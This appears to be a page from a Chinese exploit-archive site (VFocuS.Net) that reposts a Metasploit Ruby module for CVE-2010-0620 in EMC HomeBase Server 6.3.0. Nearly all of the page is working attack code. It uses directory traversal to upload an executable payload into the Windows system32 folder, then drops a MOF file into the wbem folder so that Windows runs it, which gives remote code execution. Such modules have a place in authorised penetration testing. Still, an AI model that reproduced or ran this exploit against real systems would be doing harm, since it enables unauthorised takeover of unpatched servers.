首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
EMC HomeBase Server Directory Traversal Remote Code Execution
来源:http://www.metasploit.com 作者:MC 发布时间:2011-04-29  

##
# $Id: emc_homebase_exec.rb 12458 2011-04-27 20:29:27Z mc $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = GreatRanking

 include Msf::Exploit::Remote::Tcp
 include Msf::Exploit::EXE
 include Msf::Exploit::WbemExec

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'EMC HomeBase Server Directory Traversal Remote Code Execution',
   'Description'    => %q{
     This module exploits a directory traversal and remote code execution
    flaw in EMC HomeBase Server 6.3.0.

    Note: This module has only been tested against Windows XP SP3 and Windows 2003 SP2
   },
   'Author'         => [ 'MC' ],
   'License'        => MSF_LICENSE,
   'Version'        => '$Revision: 12458 $',
   'References'     =>
    [
     [ 'CVE', '2010-0620' ],
     [ 'BID', '38380' ],
     [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-020/' ],
    ],
   'Privileged'     => true,
   'DefaultOptions' =>
    {
     'EXITFUNC' => 'process',
     'InitialAutoRunScript' => 'migrate -f',
    },
   'Payload'        =>
    {
     'Space'    => 2048,
     'DisableNops' => true,
     'StackAdjustment' => -3500,
    },
   'Platform'       => 'win',
   'Targets'        =>
    [
     [ 'Automatic',  { } ],
    ],
   'DefaultTarget' => 0,
   'DisclosureDate' => 'Feb 23 2010'))

  register_options(
   [
    Opt::RPORT(18821),
    OptBool.new('SSL', [true, 'Use SSL', true]),
   ], self.class)
 end

 def exploit

  name = exe_name()
  exe_upload(name)
  select(nil,nil,nil,2)
  mof_upload(name)
  select(nil,nil,nil,4)
  handler

 end

 def exe_name

  rand_text_alpha_upper(8) + ".exe"

 end

 def exe_upload(exe_name)

  # this uploads our final exe payload.

  data = generate_payload_exe
  exe_dir = "/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\WINDOWS\\\\system32\\\\"
 
  connect

  banner = sock.get
   if ( banner =~ /EMC HomeBase HomebaseSSL Service/ )
    print_good("EMC HomeBase HomebaseSSL Service Detected!")
    print_status("Sending exe payload '#{exe_name}'...")
    sock.put("DATA #{exe_dir}#{exe_name} #{data.length}\r\n")
    ready = sock.get
     if ( ready =~ /150 Ready to Recieve Data/ )
      print_good("#{ready.strip}")
      print_status("Sending '#{data.length}' bytes of data...")
      sock.put(data)
      complete = sock.get
      if ( complete =~ /226 Data Complete/ )
       print_good("#{complete.strip}")
       print_status("Sending 'QUIT")
       sock.put("quit\r\n")
       return
      end
     else
      print_error("Something went wrong...")
      return
     end
   else
    print_error("Not a EMC HomeBaseSSL Service")
    return
   end
  
  disconnect

 end

 def mof_upload(exe_name)

  # this is what runs our uploaded exe payload.

  mof_name = rand_text_alphanumeric(8+rand(8))
  mof      = generate_mof(mof_name, exe_name)
  mof_dir  = "/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\WINDOWS\\\\system32\\\\wbem\\\\mof\\\\"

  connect

  banner = sock.get
   if ( banner =~ /EMC HomeBase HomebaseSSL Service/ )
    print_good("EMC HomeBase HomebaseSSL Service Detected!")
    print_status("Sending MOF file '#{mof_name}'...")
    sock.put("DATA #{mof_dir}#{mof_name} #{mof.length}\r\n")
    ready = sock.get
     if ( ready =~ /150 Ready to Recieve Data/ )
      print_good("#{ready.strip}")
      print_status("Sending '#{mof.length}' bytes of data...")
      sock.put(mof)
      complete = sock.get
       if ( complete =~ /226 Data Complete/ )
        print_good("#{complete.strip}")
        print_status("Sending 'QUIT")
        sock.put("quit\r\n")
        return
       end
     else
      print_error("Something went wrong...")
      return
     end
   else
    print_error("Not a EMC HomeBaseSSL Service")
    return
                        end

  disconnect

 end
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·libmodplug <= 0.8.8.2 .abc Sta
·Subtitle Processor 7.7.1 SEH U
·NetOp Remote Control 8.0, 9.1,
·OSX/Intel reverse_tcp shell x8
·Subtitle Processor 7.7.1 .M3U
·Microsoft Office Excel Axis Pr
·MJM Core Player 2011 .s3m Stac
·WordPress SermonBrowser Plugin
·MJM QuickPlayer 1.00 beta 60a
·OpenMyZip V0.1 .ZIP File Buffe
·Maxthon Browser 3.22.2000 Deni
·ICONICS WebHMI ActiveX Stack O
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved